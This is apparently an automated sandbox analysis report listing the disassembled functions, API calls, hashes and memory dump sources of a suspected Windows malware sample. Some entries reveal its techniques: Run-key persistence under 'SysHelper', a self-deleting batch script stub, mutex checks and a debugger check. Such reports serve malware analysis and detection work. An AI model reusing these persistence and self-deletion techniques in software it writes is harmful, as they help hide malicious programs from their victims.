                                                                                                        • Instruction Fuzzy Hash: 97C18E75E003499FCB54CFA9C885ADEFBF1FF48310F24856AE919E7201E334AA558B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F3419D
                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00F34252
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DebuggerPresent_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2328436684-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00F21190
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F211A0
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989222877-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00F1EA69
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F1EA79
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989222877-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 00F1EC80
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00F1EC90
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextDestroyHashRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 3989222877-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F34266,?,?,?,00000001), ref: 00F429F1
                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F429FA
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • EnumSystemLocalesW.KERNEL32(00F487B4,00000001,?,00F476BC,00F4775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00F487F6
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2099609381-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,00F3580F,?,00F3580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00F48875
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,00F41DA6,00F41D5B), ref: 00F429C1
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00F33FED,01017990,00000014), ref: 00F378D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                        • Instruction ID: 6fc5d57634d42f2410e8b92ab2cdf36b66cb584c52072b6e6d0e6551b7b34d4a
                                                                                                        • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                        • Instruction Fuzzy Hash: 61617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119AC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                        • Instruction ID: f0bbc6164fe115f7ba2757cc5a559f653448d54a8db61039f21a581596d43bfd
                                                                                                        • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                        • Instruction Fuzzy Hash: A151DE229257B945EBC3DA3D88504AEBBE0BE49206B46055BDCD0B3181C72EDE4DB7E4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                        • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                                                                                        • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                        • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                        • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                        • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                        • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2546dc63a4d397b90d566686cd8396e2c173d53ae3b0b387b31168de1b73c066
                                                                                                        • Instruction ID: 84ea0c41d7d54d0ac2b9802aeacb1daab3f7fcff3e7018c8f800a21bf5de6f20
                                                                                                        • Opcode Fuzzy Hash: 2546dc63a4d397b90d566686cd8396e2c173d53ae3b0b387b31168de1b73c066
                                                                                                        • Instruction Fuzzy Hash: 0731F2706183419FD741EF29C880A8BF7E5FFC8358F05C959F9889B221D734A985DBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 1ee4ded40b3fa2fa97b33232b5a85d1c38807d22ddac25f90b12ef7aeca24587
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: 84112B7BA4518143D634CA3DD4B4AFBA395EFC5331F2C437BD0418B758DA22E945B500
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                        • Instruction ID: 90a37267b5c5a23d32dad7d8286a1112641ec90492ac38e6cb0d295d4478e489
                                                                                                        • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                        • Instruction Fuzzy Hash: 88111F4A8492C4BDCF424A7840E56EBFFA58E37218F5A71DAC8C45B753D01B190FE7A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                        • Instruction ID: e8c2067b7dda74bdd1fa97ec87f47b6fb51a9a3540bdbf2de386efe37848556c
                                                                                                        • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                        • Instruction Fuzzy Hash: 01014F768146629BD700DF3ED8C0456FBF1BB082117528B36DC9083A41D334F562DBE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c8436146be692220618587e495f94de66f064fab2dd797080bc919182742124d
                                                                                                        • Instruction ID: e632d2071b7f95a13dc165cd3c260e4860b0f856fbb3b94e72a685af9f0cbca8
                                                                                                        • Opcode Fuzzy Hash: c8436146be692220618587e495f94de66f064fab2dd797080bc919182742124d
                                                                                                        • Instruction Fuzzy Hash: 0CE08675800006AADE11CD24DD81BE1F3EAF7E2724F588954F585D7009D33995599762
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                        • GetLastError.KERNEL32 ref: 00F22509
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        • CloseHandle.KERNEL32 ref: 00F22539
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00F22550
                                                                                                        • GetLastError.KERNEL32 ref: 00F2255B
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2256E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2372642624-488272950
                                                                                                        • Opcode ID: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction ID: 9288ad868330e6beb3553e169c152616d8c298ca4c49b665ccee4b1b562e3688
                                                                                                        • Opcode Fuzzy Hash: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction Fuzzy Hash: C0719F7294021DABDB20DBB0EC89FEA77ADFB44300F004596F649D6050DB799A88DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                        • API String ID: 909875538-2733969777
                                                                                                        • Opcode ID: e979f065ea4f3c73c9f90dc588524082ac406fc082d02c00b9b428cf2dfaa759
                                                                                                        • Instruction ID: 3ad1735bb235c68e2ba4925fc72fe9eb706752ac004ed8554179e8152b7979e6
                                                                                                        • Opcode Fuzzy Hash: e979f065ea4f3c73c9f90dc588524082ac406fc082d02c00b9b428cf2dfaa759
                                                                                                        • Instruction Fuzzy Hash: 20F1E872A08341BBE721EA24DC42F5B77D89F55714F04482AFE8CD7282E674DA09B793
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1503006713-0
                                                                                                        • Opcode ID: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction ID: e9cb9cce1623197742303412616093f997bc08bf43e6866a0c50b5bd5cd345b6
                                                                                                        • Opcode Fuzzy Hash: c1ff839586c6294d4ba86e8ea4cf07bdbbb4f7a6c2a0984b3f108c57cdc4a136
                                                                                                        • Instruction Fuzzy Hash: FD218476509A05EBEB217F65DC02E0FBBD4DFC1FB0F14442AF48496191EE699810FB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00F2BB49
                                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F2BBBA
                                                                                                        • _malloc.LIBCMT ref: 00F2BBE4
                                                                                                        • GetComputerNameW.KERNEL32(00000000,?), ref: 00F2BBF4
                                                                                                        • _free.LIBCMT ref: 00F2BCD7
                                                                                                          • Part of subcall function 00F21CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D12
                                                                                                          • Part of subcall function 00F21CD0: _memset.LIBCMT ref: 00F21D3B
                                                                                                          • Part of subcall function 00F21CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00F21D63
                                                                                                          • Part of subcall function 00F21CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FDAC68,000000FF), ref: 00F21D6C
                                                                                                          • Part of subcall function 00F21CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00F21DD6
                                                                                                          • Part of subcall function 00F21CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00F21E48
                                                                                                        • IsWindow.USER32(?), ref: 00F2BF69
                                                                                                        • DestroyWindow.USER32(?), ref: 00F2BF7B
                                                                                                        • DefWindowProcW.USER32(?,00008003,?,?), ref: 00F2BFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3873257347-0
                                                                                                        • Opcode ID: 47e769d4d4bcdcbf82e9d4f804837306c6f4fdbe753364fc72aa05533c98b2d6
